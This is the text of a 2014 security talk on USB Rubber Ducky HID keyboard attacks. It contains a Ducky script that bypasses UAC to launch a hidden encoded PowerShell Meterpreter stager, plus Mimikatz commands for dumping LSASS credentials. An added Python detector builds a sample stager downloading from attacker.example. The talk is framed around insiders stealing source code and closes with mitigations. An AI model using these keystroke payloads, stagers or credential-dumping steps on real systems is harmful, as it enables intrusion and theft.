duck hunter - the return of autorun
10/02/2014 Nimrod Levy, Information security consultant
Duck Hunter: The return of autorun
$ WHOAMI
• Information Security consultant at 2Bsecure@Matrix
• Certified OSCP (Offensive Security Certified Professional)
• Security tools personally developed: AutoBrowser 3.0, Subdomain Analyzer, PyWeakServices tool
• 1st Place at The Israel Cyber Challenge, 2014 (the Symantec™ Cyber Readiness Challenge, hosted during the CyberTech event)
The mission
We are employees in the “Fakesoft” company and we are
very disappointed by the way the administration is
behaving.
We think that we can develop the software by ourselves
and make a fortune. We need to find a way to take over a
"Domain Admin" user account, through this account get
access to the backup server, and copy the source code of
the software.
Obstacles
• Antivirus software is installed and running on end-user stations.
• No internet access.
• Segmentation with a central firewall.
• Use of all removable storage is denied from the stations.
Programmable HID USB Keyboard
USB Rubber Ducky:
The USB Rubber Ducky is a small device that presents itself to the host as a USB HID keyboard (or mouse). When it is connected to a computer it is accepted like any other keyboard and types a pre-programmed sequence of keystrokes. Because the host enumerates it as an input device rather than as mass storage, a block on removable storage does not stop it, and every keystroke it sends carries the privileges of the logged-on user, much as autorun used to run code simply because a device was plugged in.
Programmable HID USB Keyboard
Examples of attack vector scenarios:
• Add users to the system
• Deploy and run programs
• Upload local files
• Download and install apps
• Go to a website for which the victim has valid cookies, and perform
a CSRF attack.
Scenario code
REM Give the host time to enumerate the "keyboard" before typing.
DELAY 3000
REM CONTROL ESCAPE opens the Start menu; "cmd" goes into its search box.
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
REM MENU (the context-menu key) opens the context menu of the search result;
REM "a" is the accelerator for "Run as administrator".
MENU
DELAY 400
STRING a
DELAY 700
REM The UAC prompt focuses "No" by default: LEFTARROW moves to "Yes", ENTER confirms.
LEFTARROW
DELAY 400
ENTER
DELAY 800
REM Extra ENTERs leave a clean prompt in the elevated cmd window.
ENTER
ENTER
REM -nop: no profile; -wind hidden: hidden window (powershell.exe accepts any
REM unambiguous prefix of -WindowStyle); -noni: non-interactive; -enc: the command
REM as UTF-16LE text, Base64-encoded.
STRING powershell -nop -wind hidden -noni -enc METERPRETER ENCRYPTED AND ENCODED PAYLOAD
ENTER
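The last STRING line depends on the -enc form of a PowerShell command, and that same form is what a defender sees in a process-creation log. The following is an added example, not code from the slides: it builds the -EncodedCommand argument (UTF-16LE, then Base64), decodes it back, and runs a small check over constructed command lines that flags the hidden-window plus encoded-command combination the script relies on. The stager text is a hypothetical stand-in for the Meterpreter payload the slides leave out; the URL attacker.example is invented.

```python
import base64
import shlex

# Constructed stand-in for the stager the slides elide. Hypothetical benign
# placeholder, not the presenter's payload.
PLACEHOLDER_STAGER = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://attacker.example/stager.ps1')"
)


def encode_command(ps_command: str) -> str:
    """Build the argument powershell.exe expects after -EncodedCommand (-enc):
    the command text as UTF-16LE bytes, Base64-encoded."""
    return base64.b64encode(ps_command.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse encode_command on a captured -enc argument (tolerates lost padding)."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def _is_flag(token: str, name: str, min_len: int) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name
    (-w, -wind and -windowstyle all mean -WindowStyle), prefixed by '-' or '/'."""
    if token[:1] not in ("-", "/"):
        return False
    body = token[1:].lower()
    return len(body) >= min_len and name.startswith(body)


def analyze_cmdline(cmdline: str):
    """Return None if the command line is not PowerShell; otherwise a dict with
    the switches the Ducky script uses, the decoded payload, and 'suspicious'
    set when a hidden window is combined with an encoded command."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        return None
    info = {"hidden": False, "noninteractive": False, "noprofile": False,
            "encoded": None, "decoded": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if _is_flag(tok, "windowstyle", 1) and i + 1 < len(tokens):
            info["hidden"] = tokens[i + 1].lower() == "hidden"
            i += 2
            continue
        if _is_flag(tok, "encodedcommand", 1) and i + 1 < len(tokens):
            info["encoded"] = tokens[i + 1]
            try:
                info["decoded"] = decode_command(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                info["decoded"] = None  # not a valid -enc blob
            i += 2
            continue
        if _is_flag(tok, "noninteractive", 3):
            info["noninteractive"] = True
        elif _is_flag(tok, "noprofile", 3):
            info["noprofile"] = True
        i += 1
    info["suspicious"] = info["hidden"] and info["encoded"] is not None
    return info


# Constructed process-creation command lines (as a Sysmon event 1 would record
# them). The first is what the Ducky script types; the others are benign.
SAMPLE_CMDLINES = [
    "powershell -nop -wind hidden -noni -enc " + encode_command(PLACEHOLDER_STAGER),
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -Command Get-Process',
    "notepad.exe C:\\Users\\alice\\notes.txt",
]


def find_suspicious(cmdlines):
    """Return (cmdline, decoded payload) for every hidden + encoded PowerShell launch."""
    hits = []
    for line in cmdlines:
        info = analyze_cmdline(line)
        if info and info["suspicious"]:
            hits.append((line, info["decoded"]))
    return hits


if __name__ == "__main__":
    for line, payload in find_suspicious(SAMPLE_CMDLINES):
        print("suspicious:", line[:60] + "...")
        print("  decoded :", payload)
```

Hidden window plus -EncodedCommand is a strong signal but not proof on its own: some management agents launch PowerShell the same way, so the decoded text, not the switches, is what should drive the verdict.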
What do we need?
Meterpreter payload stager:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. The PowerShell one-liner typed by the Ducky carries only the stager; the rest of Meterpreter is fetched from the attacker's handler, which, given the "no internet access" obstacle, must be reachable from inside the network.
What do we need?
Mimikatz:
Mimikatz is a post-exploitation tool written by Benjamin Delpy (gentilkiwi).
The Mimikatz functionality we use here reads the logon sessions cached in LSASS memory and recovers clear-text credentials of the user accounts that have logged on to this machine. Reading LSASS requires SYSTEM (or debug) privileges, which is why the session is elevated first.
Post-exploitation scenario
Command                                            Explanation
getsystem                                          Attempt to elevate your privilege to local SYSTEM.
load mimikatz                                      Load the Mimikatz extension into the session.
mimikatz_command -f sekurlsa::logonPasswords full  Run a custom Mimikatz command; this module extracts the passwords held in LSASS memory.
background                                         Background the current session.
Result
Now we have taken control of a domain admin account that
is not linked directly to us. What can we do?
• Copy the source code we initially wanted.
• Delete or manipulate sensitive organizational data.
• Full control of user account management.
• Install malicious applications using the GPO.
Mitigation
• Define a whitelist of authorized devices. Blocking removable storage alone does not stop a device that enumerates as a keyboard, so the whitelist has to cover HID devices as well (for example, allowing only known hardware IDs through device installation restrictions).
• Increase awareness of social engineering among the employees: the device only works once someone plugs it in.